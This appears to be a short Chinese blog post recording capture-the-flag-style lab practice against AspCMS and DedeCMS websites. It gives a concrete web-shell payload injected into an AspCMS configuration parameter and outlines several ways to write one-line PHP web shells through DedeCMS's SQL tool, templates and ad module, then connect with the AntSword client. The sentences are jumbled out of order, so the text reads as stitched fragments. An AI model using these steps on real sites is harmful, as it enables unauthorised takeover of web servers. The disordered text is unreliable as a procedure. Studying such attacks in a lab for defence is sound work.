mirliasheong的博客

在slideTextStatus=1后面写上%25><%25eval(request(chr(65)))%25><%25。我们在去访问这个文件config/AspCms_Config.asp再去蚁剑连接，连接成功。打开aspcms靶场。

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW。输入select @@datadir我们可以看到mysql路径。再用蚁剑连接一下试试。

去访问这个/dede/uploads/puls/ad_js.php?来到系统-sql命令行工具写个一句话木马到网站的绝对路径在提交。更改一下主页位置，把html改为php，动态浏览改为生成静态。回到生成-更新主页HTML，点击更新主页HTML——>浏览。再去模板-默认模版管理-index.htm（主页面板）上传一个php文件，内容同样写一个php代码。新建一个php文件，内容写个php脚本语言。来到模块-广告管理——>增加一个新广告。来到生成-更新主页HTML。去连接一下，连接成功。